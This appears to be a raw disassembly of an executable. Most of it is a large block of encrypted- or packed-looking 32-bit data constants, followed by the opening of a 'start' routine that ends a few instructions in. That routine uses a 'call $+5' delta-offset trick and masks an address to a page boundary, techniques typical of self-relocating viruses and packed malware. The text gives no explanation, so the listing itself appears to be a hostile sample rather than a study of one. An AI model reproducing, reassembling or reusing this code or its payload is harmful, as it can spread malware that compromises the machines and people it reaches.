dd 0F83C698Bh, 0BC11EEEh, 4420A37Dh, 8CDF677Ch, 40F623BAh
dd 3E15A2Eh, 835AA755h, 0DA298ED7h, 91EC47D2h, 0A2F1DFCAh
dd 0C4304913h, 4079C8CAh, 0EE31249Bh, 0E191105Fh, 4095419Ch
dd 36749867h, 0F10D5CEBh, 82D1DF2Ah, 4624CD73h, 34D8E837h
dd 9854FEABh, 9284F5B0h, 90663443h, 1795540Fh, 0DEF438C4h
dd 0C20D408Fh, 9A59F726h, 0E63CC72Dh, 837D8CDBh, 0D2217092h
dd 0D1E42983h, 5FCAC02h, 4B6DA087h, 3D6F2193h, 0F2A10C93h
dd 34185902h, 21679C38h, 1409C5D0h, 99258BC4h, 7DF98276h
dd 0FC5AFC0Bh, 9EE47F9Dh, 0D53504A6h, 0FAA95897h, 6EB4244Bh
dd 5D0590DFh, 99693A94h, 45C97CC6h, 3EBBFCFEh, 7691652Fh
dd 4FDC97C5h, 0CAEF2232h, 4EF57D7Bh, 4321F03Dh, 2935E292h
dd 0DA1F5C12h, 5D78B14Bh, 32B18014h, 77214DE0h, 0BB681AC7h
dd 9B9199A4h, 7606D05Fh, 0AD06B07h, 20918D2h, 0C9409C68h
dd 4391607Ah, 490627CAh, 8B4EFCB1h, 0C38129E9h, 3D935316h
dd 62C39B70h, 0B400EF9Bh, 0ED5A13EFh, 0D0844313h, 12DBA161h
dd 590BED81h, 0B25323F2h, 0DEB1681Ah, 4E0A60Ch, 4828CC27h
dd 0B679398Ch, 82A513C0h, 0B66A2471h, 0B59E848h, 0B672DE8Bh
dd 0FB0F1DD6h, 37825731h, 63D1996Bh, 0DE01CCE5h, 0A97209C1h
dd 0DC876973h, 10CBBB63h, 7D2886AAh, 8B2102DAh, 83F52693h
dd 54A9E957h, 46DB20Bh, 8B5EEAC2h, 0F0F344FDh, 3FED5A1Eh
dd 0EB5B931h, 8F61B0FFh, 8B919902h, 0DF2F3807h, 1EEDE97Ch
dd 0B6E47FCFh, 273504A6h, 968D17BFh, 0DB36D271h, 3201A58Fh
dd 0D839F8BAh, 3BAF32D2h, 0B902355h, 42EC6D0Ch, 4D15E4C5h
dd 2F8E6AC1h, 0CB10891Dh, 12E1C355h, 0E5F5314Ch, 13D378C7h
dd 1061C60Dh, 63003BF1h, 659E4B31h, 0FF88CD1Ah, 0C4AD0C1Bh
dd 8D8FBA1Fh, 767030B6h, 0DE75DBE7h, 95B818A3h, 42912487h
dd 4513B733h, 428C57F7h, 66DD2C8Eh, 0AD1ECC37h, 16A5F3EBh
dd 992FEBC7h, 9E7E33D4h, 977995B0h, 575DC453h, 0C286772Bh
dd 11C2BFCDh, 0A1C29DA0h, 7D6DD423h, 6F499827h, 0CD5F19B8h
dd 0CE954E9Dh, 0D36A243Fh, 0A19DDABh, 0CE1DA613h, 0E25207BFh
dd 228B5D31h, 4AA9B961h, 0EB252934h, 67B840CFh, 0A6B53107h
dd 0E734F918h, 2E3D943Bh, 0C447D516h, 499414E3h, 3ABC44F2h
dd 3A250F2Bh, 4F11A0EFh, 0C6CD8906h, 0F7147177h, 0E1DDA17h
dd 2D976617h, 13E2127Ch, 5AA92520h, 0BB2E0CF4h, 22319DA6h
dd 0C1A0C993h, 0FAF9484Ah, 4BCA64Fh, 3029C2DFh, 98554E3h
dd 0FAFF2832h, 244D596Bh, 8FDCC25Ah, 0C655B9A9h, 7DF02E5h
dd 0E804BCEh, 42F7A43Fh, 2937E593h, 0DA1F4C12h, 0CB12644Bh
dd 62F1F623h, 1E380115h, 23948D7h, 0AEFD0C57h, 31CE8348h
dd 1877A768h, 0FA4514A3h, 8B518954h, 2A02202Fh, 655E434h
dd 0D25D1D7Ah, 3846CFBh, 12D4CCC2h, 0E0F41C03h, 0D6814738h
dd 0C92D7C8Bh, 0ECB84E06h, 229B9056h, 0D579C49Bh, 0AE08D00Eh
dd 0BD01955Fh, 768433E7h, 3F210B27h, 730D5CEBh, 0C2C9E21Ah
dd 0FB187D73h, 0A19DE2Fh, 31EBB613h, 8E9CF340h, 56E57475h
dd 1B6B7C08h, 32ECBCCBh, 0E231411Fh, 0A7F46C07h, 0FF46C817h
dd 2E3DB927h, 0F391941Eh, 3D9514A3h, 2889B2B3h, 85109D4h
dd 294A0AFh, 0EED811EAh, 4A993BFFh, 3BE179C4h, 308AB0BFh
dd 8B4CC900h, 2FE93807h, 73287122h, 7271C0D2h, 0D03DD16Ch
dd 6A7C0817h, 6F864814h, 72CA90DFh, 905DFEFh, 0D34C9797h
dd 0B88D9C76h, 4269ADAAh, 0C67FA5F3h, 88B369DDh, 7889B984h
dd 0EA22F07Fh, 0C4E1BB3Ch, 9297886h, 4388A9C6h, 72DBC04Fh
dd 0B38AD781h, 0EA797E93h, 2BF2CCDEh, 7281D0EDh, 2BC329AEh
dd 0F2B858A7h, 4137A043h, 42054890h, 2D0BE433h, 0EE2D2111h
dd 164893EFh, 0DFE1704Ah, 56B860BEh, 326809C7h, 61D28616h
dd 0B2D544C4h, 6DBD24D2h, 0EB7DAC93h, 0AA36447Bh, 5A91187Bh
dd 7685D466h, 427FB602h, 6BF20BEBh, 829155FBh, 8099E0F0h
dd 8779EE70h, 8E002D6Eh, 0FA211ABFh, 56E53462h, 8F56AB55h
dd 0DE2D8ADBh, 0F6153C02h, 0FE60FB04h, 0ACB98822h, 6E77B4DFh
dd 0A55150F5h, 0A650EBF0h, 79899851h, 9CF011CDh, 0A811E0F2h
dd 86D90CB3h, 19CE2877h, 384D79C4h, 0DE5CB0BFh, 0E3257483h
dd 145CB50Ah, 93ADBC3Dh, 6249CD42h, 8CFB6F93h, 0F9AF5957h
dd 58B159E4h, 0CAC2909Fh, 672A2AE3h, 0F44E62Ch, 7ECDEA25h
dd 0ACA3ED9Fh, 2E75B486h, 7526924Fh, 0AD8A5E1Ah, 13D67D36h
dd 19EE5E28h, 27A4B6ACh, 5EAD0A05h, 953664FCh, 0D9263D38h
dd 0AA0F4802h, 0D9408C5Bh, 7381900Ah, 62DBE57h, 5095892h
dd 0FEF8A03Eh, 0F2CA06Fh, 655A40Bh, 4FDEB983h, 8E9D71D2h
dd 52E1307Fh, 2EE871C5h, 3369B887h, 61D282DDh, 0B7718588h
dd 66B5C453h, 0E82408D7h
dd 0E4304C9Fh, 0DDAF3010h, 19A5BA0Ch, 5325B841h, 0DE2C398Dh
dd 0EBA540E0h, 32B5411Eh, 6F3AC858h, 0BC7FC997h, 0B34404DEh
dd 76C53E4Eh, 5589D827h, 0B318CFEBh, 0C24325E2h, 0C2876534h
dd 6798A672h, 4218DED1h, 9E753EFAh, 0DAB667C6h, 1BE1F81Eh
dd 1E34EC5Bh, 0E275CE8Eh, 0E3A51CD6h, 24F85C14h, 7D7DC04Fh
dd 0B60FD18Bh, 0AC421AEAh, 50E41567h, 7DD99D5Ch, 451FE9A7h
dd 8A5925B3h, 0D3986C77h, 0AD3AD3Bh, 5528FEFFh, 0D629208Bh
dd 9ABB77C1h, 1BE4AE0Dh, 22228441h, 0A76284BAh, 87E31CDEh
dd 2BF57B71h, 7381954Dh, 0AF45D1B1h, 0BA050DE8h, 3B844E2Dh
dd 5DC2A461h, 4B1AC7F3h, 0A31969F2h, 0DD942C2Fh, 1FE8A43Fh
dd 7F65B546h, 0DA7A7F93h, 0DBB97DC7h, 469B2D4Eh, 0EB6523B7h
dd 0E3567C8Eh, 0C4CDCAAFh, 0B22F7Fh, 687D4CB0h, 0C973CB06h
dd 0D93DDA9Fh, 479399E2h, 2E9275E9h, 4039BF85h, 0B95D2262h
dd 0EEFBBB06h, 7647B8AFh, 3A499827h, 0FE0D5CEBh, 82D160AFh
dd 46952473h, 0A59E837h, 0CE1DACFBh, 922170BFh, 56E53443h
dd 1AA9F807h, 0DE6DBCCBh, 0E231408Fh, 0A6F50453h, 6AB9C817h
dd 2E7D8CDBh, 0F201509Fh, 0B6C514A3h, 7A89D867h, 3E4D9C2Bh
dd 0A211A0EFh, 0BF73C130h, 0C9992837h, 4E64469Eh, 656EB0FFh
dd 0C5A860C0h, 115E375Fh, 957DFF0Dh, 955A48Bh, 0FF4748D1h
dd 0D9F14A6Ch, 7AFF470Fh, 0BB4DD2F4h, 0B63CF276h, 104C91A7h
dd 958D9C52h, 2A93632Ah, 4747D11h, 0F5168B3h, 4EDD0E8Ch
dd 12A194D7h, 0D67ADCC3h, 1FA47887h, 5EAD1E6Fh, 16A9F956h
dd 22B507DFh, 6FC6BF75h, 0AEBD35D5h, 715827DCh, 766763AEh
dd 519BBE7h, 0BE42E0DBh, 0A095C8ECh, 22C86DC5h, 4919E8D5h
dd 8BA96C81h, 20E20254h, 0EAEB7913h, 5937E39Fh, 9A597CB1h
dd 0A11A32B0h, 8EA5B6ECh, 0D5867780h, 631682B0h, 0B28129F5h
dd 42CED73Bh, 0A8CC17E4h, 390D1CD2h, 0C2E8EE2Ah, 46952473h
dd 0A650037h, 4B96ACFBh, 92614931h, 0A91241ABh, 1AB110F8h
dd 63EEBCCBh, 0E2717901h, 2FFD7153h, 2A9B688Ah, 0D1E167DBh
dd 0B238DE12h, 334AD7A3h, 7AC9E1F5h, 7C309A2h, 0C1F9A0AFh
dd 0B5D564B3h, 0D912EBBEh, 0E5DECBBh, 2C8C58ADh, 3268B7Ch
dd 5AA901EDh, 642E2A08h, 0A67E80C3h, 0E6354594h, 0AAE972D4h
dd 6E404814h, 70CA90DFh, 3EED04EFh, 0B936E759h, 3EB476EEh
dd 5297E32Fh, 3F95AC79h, 0AC01CB7h, 4DE90282h, 99501B7Fh
dd 37E4B58Bh, 45F6A758h, 12A9C5CAh, 8EC4C043h, 0A5BDAF8Ah
dd 6536B26Eh, 0AEFD0CECh, 8CF95179h, 0B34AA610h, 0FA09584Ch
dd 0BEF79FFDh, 81A251Ah, 8D570F23h, 9BE8ABFDh, 71231E53h
dd 0F8543380h, 0BBA5B43Ah, 21117842h, 9EA9F884h, 170E004Fh
dd 66F5FDB9h, 0D42C6087h, 6B3EB364h, 0B28129F5h, 4F2F51ECh
dd 3E4A9867h, 3E8E0FCFh, 8D0A53ADh, 54762CC5h, 597921B7h
dd 0CA39883Ah, 0BB056C96h, 16BE104Fh, 0E12811ECh, 3D66BC4h
dd 19B07EFBh, 7D9B41FBh, 9138FE63h, 0D1DCB782h, 9807EEBh
dd 1A703675h, 8108FE13h, 0CD1575B8h, 3990BE9Bh, 758D8DCEh
dd 0B1183E03h, 0EF78D37Dh, 29E0BE8Bh, 77004BB3h, 0CF163E33h
dd 1EEDC599h, 0DD006994h, 656BBB6Ch, 45101C95h, 0AD4233E5h
dd 6A45FADCh, 9F3410Bh, 6B5C9058h, 188D9C4Fh, 49D197h
dd 0C5F16411h, 21BF8AB5h, 0A6C52A11h, 0ED5E05C5h, 516D7640h
dd 0C22C1256h, 0A118D1A3h, 614B40F0h, 76C58FA0h, 0CEE8CD95h
dd 45570C1Bh, 2AE9BA38h, 35BF1489h, 0EBB94092h, 4138D143h
dd 42909890h, 0D4D1E433h, 2AC8A583h, 7836A645h, 52593594h
dd 0BD25F403h, 57AA0725h, 0DE194036h, 9374F74Fh, 66B58427h
dd 5EF988D7h, 445DFC98h, 86F095A8h, 7686D423h, 0BE469927h
dd 0FE0D5C1Dh, 6E5A3517h, 0CF3E8F9Bh, 4A607E8Ah, 64F51CFBh
dd 0A3A48714h, 56E57477h, 93A8F807h, 9E542676h, 157A348Fh
dd 0E6C135D6h, 6AB9C817h, 4A1A34D9h, 0F7746660h, 3DA1731Bh
dd 0C2EF7349h, 952B9C2Bh, 9FA1A39Bh, 0B7509319h, 4A996843h
dd 0B655EC3Bh, 0D269DD72h, 13D262F6h, 5AA90C76h, 1AADFC0Bh
dd 2AB40377h, 5E303093h, 0AA01E5D4h, 0EB4A83B0h, 3201A4EEh
dd 0F60554E0h, 53791CD3h, 0FB0677C1h, 211D9B9h, 0E3E6B78h
dd 7D25203Eh, 0EA91DFEh, 12A1F33Fh, 6E3AC0C3h, 0ACD61CE0h
dd 677381C2h, 0DA1AC04Fh, 421284D3h, 0CCB0F03Ch, 46560C5Bh
dd 8D7E2EA2h, 0F9ADB493h, 19F6A71Bh, 41757A92h, 0D33A467Ah
dd 37C06F98h, 3D19E8C3h, 8D1F9B69h, 27E1307Fh, 0E8321C17h
dd 0C5D94738h, 61D1D563h, 5D4966B0h, 0F71EA206h, 0A1B6037Ch
dd 0AE04D21Eh, 3B093B5Fh, 0F372282Bh, 3A09AC16h, 0FE0D5CEFh
dd 0AB6972DBh, 0ED5DDAB3h, 7E99E08Fh, 0BBA507FFh, 39469B47h
dd 62D4B1B4h, 1AA1F847h, 9418BCCBh, 0D61EFD0Fh, 0D2F50413h
dd 72907056h, 8B7745F2h, 0F24164B4h, 0BCC6F063h, 3ABDF3C2h
dd 8FFD372Bh, 0ED942A45h, 2CD52487h, 0CF9368C7h, 0E1DD810h
dd 30D9D655h, 0A7A0837Eh, 4AE97873h, 6AADFC0Bh, 883830C8h
dd 1A40FCF5h, 4249A331h, 0C57DFFB1h, 0BC32D56h, 73F254A3h
dd 0BA892C96h, 7E8DDC4Bh, 5AE1E95Ah, 0F23C21F9h, 0EC7368F7h
dd 0B95DADC3h, 5295C1BAh, 0D665F4C3h, 1A2A0C87h, 0FBE7148Fh
dd 62F1F426h, 9BFC2FB5h, 0EA797111h, 9F78FBF0h, 7281902Bh
dd 43059423h, 0F859E8EEh, 0FEF9352Eh, 0C7668A6Fh, 615D002h
dd 0CA19A877h, 366D67CEh, 66CBB575h, 0FD0FF443h, 0EBD1DEFAh
dd 0AFA88B93h, 0A2F1407Bh, 12B5C412h, 205038D5h, 0AE09663Eh
dd 0B125D05Fh, 42AF7169h, 912F9867h, 0E8CE48Dh, 0B6E0E558h
dd 44952433h, 82CE837h, 6B17644Fh, 92614495h, 0EB6C9F25h
dd 1AE9C1A5h, 0DE498073h, 67C6EB8Fh, 0A6B53062h, 6AB9C81Fh
dd 0AB8AE0AFh, 0F24164AEh, 0B6C510A3h, 0C239D312h, 0A661921h
dd 29BBA0AFh, 0B75093FEh, 4A996843h, 7B5DEC33h, 51D9D6EEh
dd 0BD807E63h, 3CE97873h, 0B46DCFA0h, 9A179524h, 433F5CBAh
dd 0AAB93C7Ch, 64BE28DBh, 7275BB7Ah, 1AE32E3h, 0FAFD2922h
dd 7E9DDC6Bh, 83E9862Fh, 4616D033h, 2FD36073h, 4EDD1850h
dd 0A4AE5B59h, 96519B46h, 1FDED387h, 5EAD087Ah, 22B1C00Fh
dd 76C58DA7h, 0DE10CD95h, 59570C1Bh, 32B5E19Ah, 36659423h
dd 8F8FE8E7h, 33C918A9h, 0E71BDE20h, 615D01Ah, 0F393257Eh
dd 25BB6CFBh, 27E4CCFFh, 96A54404h, 70294788h, 0AA1CF97Ch
dd 0E2F1000Fh, 0DED3C413h, 280CB9B1h, 455B652Fh, 37CB08EFh
dd 76C5E048h, 904A78E7h, 7BFAD45Bh, 8291549Eh, 4695A473h
dd 8CE9EA42h, 0FA340971h, 394770FFh, 23E0C8C3h, 9AA94800h
dd 742D4384h, 0D600C578h, 0A6F50413h, 61CCC816h, 0AB77CC6Bh
dd 0F24164B6h, 0D0CAFF09h, 70495BDFh, 7E79B58Eh, 72BAC6EFh
dd 322CEB2h, 4AD91C46h, 0E5FEC3Bh, 57969F8Ah, 966540B2h
dd 5AED3847h, 0DE1DE67Eh, 165A05C5h, 43BF44D3h, 0AAB93C67h
dd 8AD2CDAh, 99C0F667h, 0FEEE5453h, 3FC35817h, 7ECDE840h
dd 33D41785h, 0C615E4C7h, 0FFD960B7h, 0CD254A6Bh, 3804FAD7h
dd 0B065F4F7h, 7128C82Ch, 54A58C43h, 2285EA8Ah, 0A3822ED3h
dd 0EA797CA6h, 0AEED0C5Bh, 57F4A5AEh, 0CEC62C45h, 0CE23FDEDh
dd 15AB1CEBh, 6B3BE05Ch, 466C6E8Eh, 0FB9C5FF7h, 8EDD2C8Fh
dd 27E1107Fh, 0FDD2451Ch, 0D3D1DEDCh, 0B4887693h, 62F1407Bh
dd 0C3BFC7F7h, 2A39BCFDh
dd 5314E7FDh, 0B28129D5h, 0D30F15E9h, 3A09A1ADh, 0A6BDF78Dh
dd 0B6F8E5ADh, 0B13F2433h, 4A6DD9B2h, 0CE1DAFFBh, 15A57FBEh
dd 0EEE53443h, 3C229C60h, 0EA5C3140h, 13B040CFh, 0A4F50453h
dd 6AB909E0h, 2B088FDBh, 75653727h, 0B67DBF8Dh, 1C89D867h
dd 584BE980h, 0A4F42B57h, 0E1B1DC18h, 79322EF8h, 0F9F68AFBh
dd 9255817Ah, 96257483h, 0ADA94D46h, 5E99CD8Eh, 227180CFh
dd 8013309Bh, 5D9585EFh, 2E89FD9Eh, 324190DFh, 37905BE1h
dd 11AFF9ADh, 76F815EFh, 6755849h, 0D5FE0F95h, 61736007h
dd 16254A75h, 3924F262h, 0B065F4F7h, 2A2A932Ch, 0DB1A9682h
dd 62F1F43Eh, 0A67584D3h, 0ED8968E3h, 9AD48971h, 9240D05Fh
dd 3ECC9939h, 5F0B58C3h, 0BE8D2882h, 0C292C4AFh, 0B6FEE0F7h
dd 727F0296h, 2BD78C44h, 52A10456h, 93525F65h, 0DA298CF6h
dd 9E2D7CABh, 2706533Bh, 66F5F022h, 0A7988D7h, 29CA41EFh
dd 0B2C1105Ch, 0E635D117h, 0B1BA738Dh, 7C80D72Ch, 0A9D12096h
dd 0BAD4ADB2h, 8F53B087h, 0CE5D98D2h, 0A3A48715h, 56E57477h
dd 6EA9B807h, 8ED5DAC7h, 0CBB44A4Ch, 4DF54467h, 9501AE1Dh
dd 7D8863Bh, 940110ABh, 8740E308h, 79899853h, 4A4C9C2Bh
dd 0F394579Ch, 86D52487h, 3EB92877h, 0D9A1B36h, 0A661B0FFh
dd 3CB5C486h, 9562CBACh, 27377980h, 0EA5A808Fh, 0D5C90C1Ah
dd 9B7CFF9Eh, 6EBD8C2Fh, 474110DFh, 0DF80D9EDh, 30C95893h
dd 870D9C63h, 8FA9932Ch, 0E25169F7h, 6A1868A7h, 0E5169C73h
dd 0AAC7F6DCh, 7D0374F2h, 1AA6C0E1h, 5EED8423h, 450C20Fh
dd 0A3DEDC78h, 8C3F3D5Eh, 0C83D3DE3h, 0D84260B4h, 27911AEh
dd 7FFE58A7h, 0BE8D289Ah, 5291206Fh, 2D02E246h, 0D3F2F00Fh
dd 0A5F53F30h, 0D9311B87h, 569C568Eh, 58FCB9C7h, 9F2D3CB2h
dd 86B58B76h, 0B084D17h, 0A179C8C7h, 0AE04CA26h, 30443B5Fh
dd 8185945Ah, 7A7DA9A2h, 0FE0D1CEBh, 75D314AFh, 42578FABh
dd 890EBE37h, 8E240246h, 162E70BFh, 56E5359Ah, 1AA9F5EFh
dd 8C28F7CBh, 0D17D05C1h, 0EAB12A61h, 0FF46C85Bh, 2E3DB953h
dd 0CBBFD516h, 3D9614E3h, 0A28AE43Fh, 0B565EFD4h, 3EF994ACh
dd 0D2A9B45h, 0AA08EE2h, 4C5EB73Bh, 10E439F3h, 952534BAh
dd 0DF603005h, 1EEDC5CDh, 0DD59F344h, 0E635C420h, 5C2CE057h
dd 0D33633E4h, 3201A979h, 0CCBCB5h, 2F42E758h, 7ECDE5CDh
dd 159AAA4h, 83EA8B9h, 85DC8134h, 4E9C4CF3h, 4825FF3Fh
dd 0D565B4C2h, 0DA10D232h, 2C583F4Bh, 0CEB18036h, 0A37A6CEFh
dd 0EA394835h, 85F94AD6h, 32B8A29Ah, 66439723h, 5FFDE0Fh
dd 18709F54h, 42916056h, 416EEF46h, 0D19AA7FBh, 65DD6CBAh
dd 0F4740973h, 19A5B43Ah, 0DA68B542h, 0ECA87F8Bh, 0C4F14076h
dd 434AFC92h, 2A850DD8h, 0AEB64C9Bh, 86823B5Dh, 80CC3C33h
dd 877067D8h, 0FE4D654Dh, 8235E5A0h, 0C3962473h, 0A19D19Dh
dd 0F76F29F8h, 92AA70FFh, 59E97368h, 1AA93585h, 0D62A87CBh
dd 0E2F5C380h, 66760453h, 7EFECB15h, 170F09D8h, 0A25350DFh
dd 8F7BA15Ch, 0EF76D827h, 3E0DA963h, 0CDD125B5h, 86D5D336h
dd 4A05C177h, 0F161EC3Bh, 0D2F535F0h, 0A8A57483h, 0D16C3752h
dd 95ADFC0Bh, 615A8189h, 3EDD14A7h, 9306F7A2h, 2E846AA6h
dd 3136E5DFh, 0B63CFE66h, 0C84C1BA7h, 0F78D9C52h, 42682AAAh
dd 0FD152FF3h, 0CAE0AA32h, 75955E7Bh, 529836BAh, 0EB0CC6C3h
dd 0EA297887h, 41050B39h, 0EFB1C00Fh, 0E7FE789Dh, 0A83A4ABCh
dd 6478374Bh, 7819026h, 2681172Fh, 0BE866918h, 55AC008Fh
dd 0C71EE374h, 615DDA1h, 0B8AC2397h, 66DD2C82h, 0AD1EC609h
dd 16A55D62h, 0D41C38C7h, 0EC213BA0h, 0AAB63B46h, 9989461Ch
dd 25307728h, 11C3FE1Eh, 96FD9BA0h, 52B473E2h, 0C5B69827h
dd 0C2E62314h, 0E2F52A2Eh, 8752473h, 6D22804h, 60982BDFh
dd 1F213086h, 56C101FAh, 682CFB07h, 0B86DFCF2h, 0C97FE52Ah
dd 0B2B70795h, 0ACB58A3Ch, 0E995779Dh, 0F201021Eh, 0B6C511A3h
dd 86CF5167h, 0B38EC274h, 8229EE5Ah, 132A32B3h, 4AD91D0Bh
dd 1A214B8h, 0D2610B7Bh, 0C4A0FD83h, 30E9787Eh, 8B52AA0Bh
dd 2231B57Bh, 623A8416h, 0AAF908F3h, 3EED0C30h, 581193B5h
dd 0F6053CE2h, 459FD8A7h, 3EB880FEh, 0FDA9632Fh, 0C32B20FCh
dd 0F5068B7h, 4EDD152Dh, 2BFB7DB2h, 43E8B483h, 9A6941E5h
dd 5E876E1Ah, 0E6243F5Fh, 0A575C4E6h, 6E36B76Fh, 0AEFD0957h
dd 0C77ED075h, 3605AD75h, 0CF89CD18h, 464E1CEBh, 0B7152F90h
dd 8F55E437h, 8A20C272h, 8D145FBBh, 3B161BCh, 0E9F4F069h
dd 9A50EE72h, 0FEB8838Bh, 27F1407Ah, 0B731CBD3h, 197988D3h
dd 80B8C552h, 0E3C15066h, 69ED8532h, 6A499727h, 0CBADC914h
dd 425460EFh, 421FA07Ch, 8FD0E837h, 0CE5D9589h, 0FBECC87Ch
dd 1D6E3443h, 2B2C0F3Fh, 0DE6DFCFFh, 9721408Fh, 0CB700755h
dd 59B98807h, 0D9BC8F09h, 7BE0A76Eh, 0F6FC6E26h, 5EB26067h
dd 75C69C2Bh, 0AF94A3D3h, 0B5D524A3h, 0BD582BA5h, 87BC1BCAh
dd 9258C67Ah, 212AB783h, 0B9103E0Ch, 6FE713Eh, 363237C0h
dd 8D7C9490h, 7AFA2096h, 19E2F69Ah, 46B8FEB6h, 0FA7FD7FEh
dd 31296AA6h, 3C06E020h, 1213E33Bh, 395DE07Eh, 4BFAB140h
dd 77F7A940h, 9962F07Fh, 0E5759097h, 22ABF747h, 9DED3C4Bh
dd 695A0F84h, 1E3B395Eh, 61C548D7h, 2343F84h, 74F3B123h
dd 3432EE1Fh, 0C6A378CBh, 822168F7h, 7E4C5441h, 0E5BD9133h
dd 0F718233Eh, 8E9834FEh, 1DC3B0Bh, 19A5A640h, 25968B42h
dd 0A32EF774h, 0E1BF4918h, 9993401Ch, 7D447728h, 0E17319D8h
dd 4D3E0BDBh, 35D2E99Ch, 0BE46AA14h, 1F2A3FBh, 0D6823092h
dd 43112B3Ch, 39A617C8h, 30304420h, 162E8F40h, 0A91ACABBh
dd 0C412A34h, 366DBCCBh, 1DCEBFE0h, 0A6F504BBh, 87389517h
dd 2E3DA351h, 0F2026D76h, 843A70A3h, 43FB6DECh, 0B7299C6Bh
dd 0FC90C6CDh, 3DA3EFEh, 4A992B51h, 0D61B2B0h, 0E9E0D621h
dd 132A31D3h, 5AE93B51h, 1EBBBFFCh, 2D7180EFh, 0E6364D16h
dd 0F6BAFE57h, 4EF34719h, 30BD14D0h, 0FAE654E3h, 0BBC8E126h
dd 0F882DC6Bh, 251E2C1h, 39EB691Bh, 695B6748h, 0C59D2C79h
dd 58A2E075h, 0D6650CCFh, 72787886h, 0A112D6A5h, 569E553Fh
dd 6C48493h, 0DE09FDA7h, 8E970C1Bh, 0AD919E1h, 0DC917C37h
dd 288CA718h, 6D0F88A4h, 7304118Dh, 0ED55A407h, 0CA1FC012h
dd 0E6846CBBh, 52E13079h, 0FC111C5Bh, 5FE34738h, 9E6D48A2h
dd 8BDB84C9h, 0EEB58427h, 6A4DA152h, 19DDAE9Bh, 0F2F521DAh
dd 7685DC63h, 0BA40ED27h, 0BE397756h, 47A561AFh, 72A4A184h
dd 0A5AE877h, 0D569ADFBh, 0A608CD3Fh, 22E03403h, 301478B7h
dd 0DB6DFCFFh, 5FB1E7FBh, 0A6B53078h, 9D27BC12h, 6E49BD5Eh
dd 0F201509Fh, 36CC6023h, 3ABDF1DAh, 0B73A9E2Bh, 0FBBF056Ch
dd 6ED564F3h, 0B566DCF8h, 0F1A02CD3h, 0D0445800h, 0BAE7483h
dd 5AA90131h, 0E15122E3h, 29F58F30h, 6D354491h, 0EAC07AE2h
dd 52E3471Bh, 0EDA94EDCh, 0F9FAAB1Eh, 0BAC8ED25h, 5AC75D6Bh
dd 0E251E04Fh, 90475A78h, 89CD12B4h, 0CB6A3C01h, 12E1C40Eh
dd 0C665B4C3h, 2FA476F2h, 5EAD0877h, 72DC4D84h, 82868493h
dd 0E336F1C0h, 1B700C5Bh, 72C1C01Fh, 36F431D0h, 5EFA5A04h
dd 8AFC995Ch, 4291202Fh, 825AF433h, 0CA19A85Fh, 66F51F44h
dd 0AD1EC110h, 2F036188h, 8ECB887h, 9EBFF884h, 177A004Fh
dd 66F5FD61h, 0AB69C25Ch
dd 0EE5D68D1h, 0F8EAF05Fh, 4587A76Bh, 2E3B9BEEh, 0EE60D1D0h
dd 0F5A60EFh, 46D5341Eh, 36D2BE45h, 0A3B82FDFh, 922130AFh
dd 568893C0h, 91A9F807h, 946CB4B1h, 65C64387h, 20708FA4h
dd 9DB9882Eh, 6E49BD5Eh, 0F201109Fh, 41C760A3h, 76FBDB7Fh
dd 8BC4AC02h, 0C2519941h, 87FD1738h, 7B1CDF47h, 4E5DAC0Fh
dd 0A661B0FFh, 0C73D8381h, 0A5158CAFh, 1246A5F4h, 959F3CCh
dd 0B06448E1h, 0F3A6ACA4h, 5A817996h, 96B2909Fh, 0C70A0ABCh
dd 684E9535h, 448DDC6Ah, 4265CFBAh, 0AF13D1F3h, 0BE8F1065h
dd 0B1CDA469h, 0ED7E3CD7h, 9CEEEE3Ch, 8A637B8Bh, 6ADCB9BCh
dd 62B1C04Fh, 67F894D3h, 632A3D91h, 0EEC4A2D6h, 1F04D31Fh
dd 0B545D433h, 0FA093540h, 0FDE61CABh, 3C24DF47h, 8F55A40Ah
dd 0CA19FA70h, 0AE9BE3BBh, 66D0B588h, 16A5F443h, 0DD1D38C7h
dd 670A94D9h, 29ABFFB0h, 268C6A9Eh, 0A37A6BD7h, 0A4B664D0h
dd 0C4449B4Fh, 4F85945Ah, 393A906Dh, 0FF051662h, 0E15270EDh
dd 0C31E242Bh, 0A19D14Dh, 0CE399093h, 9A6371BFh, 6A6351Ah
dd 2E866D8Dh, 5B9ABC8Bh, 0E27174BEh, 0B6F50453h, 0E7BACE63h
dd 2E3D9CB6h, 77F65029h, 0B6852092h, 7A8BD867h, 0F8B3885Eh
dd 0F6202518h, 86D564F3h, 4CEC2873h, 3A6D59B1h, 5796B0BFh
dd 966540B2h, 5AE97847h, 1927F77Eh, 20DB42CDh, 0DC2A645h
dd 98FE825Eh, 0B8BF66D9h, 0E072673Dh, 9227DF87h, 39911A28h
dd 3EB48AD6h, 865EE02Fh, 39EA5F7Bh, 0B3ABDD48h, 0DB622C3Bh
dd 12E1C5FBh, 0EF0B013Ch, 0FD678C7h, 5EAD0977h, 5BEB4D82h
dd 0B3F88493h, 0EA7971F5h, 0AE975E0Ah, 4BD765E0h, 0A3BA9463h
dd 0FA496D5Fh, 879BA954h, 0D76E202Fh, 615D10Fh, 0F2571D7Ah
dd 3B226CFBh, 52A1092Dh, 0A2300B55h, 5969F8F2h, 0DE142A2Eh
dd 4A32004Fh, 66B5C413h, 0AB78E28Ah, 0AE0E0576h, 0BD31485Fh
dd 630551A2h, 0FACC9867h, 1C5DF28h, 7106F5Fh, 46D531F3h
dd 0A49D5F4h, 0D268ACD1h, 0B65DF1D9h, 2394584Fh, 0DE419814h
dd 0AB924334h, 194FA88Ah, 741DFBACh, 0B4637E8h, 565073F5h
dd 4A1364C9h, 0B6C51486h, 852C3007h, 73863D4h, 0F235E464h
dd 0BE9BD13Eh, 1A122837h, 34DC8A33h, 0F712B2F9h, 96251CD5h
dd 9E6238B8h, 4EFFFC61h, 17891530h, 22B644D3h, 0F6C7895Fh
dd 1BE1F324h, 368713DCh, 9FE7F0Bh, 45B6F058h, 0BDEC2394h
dd 2519497h, 7EA44FF3h, 8AD96898h, 4E9D3C93h, 1281323Fh
dd 0D665847Bh, 9A2A9087h, 7A2F3C4Bh, 46E54D0Fh, 0A55B49DFh
dd 0F345486Fh, 0AEFDE43Bh, 260AD01Fh, 0BD18A407h, 0E9E4D9FDh
dd 56CD5C9Fh, 0BD6EC556h, 6512652h, 0CB1FAFF5h, 670269B8h
dd 5A389010h, 7F7FCA20h, 4FDF9Fh, 28BEh dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_C = dword ptr -0Ch
var_4 = dword ptr -4
call $+5
push ebp
mov ebx, [esp+8]
mov ebp, [esp+8+var_4]
sub [esp+8+var_4], 0DE05h
and ebx, 0FFFFF000h
sub ebp, 401005h
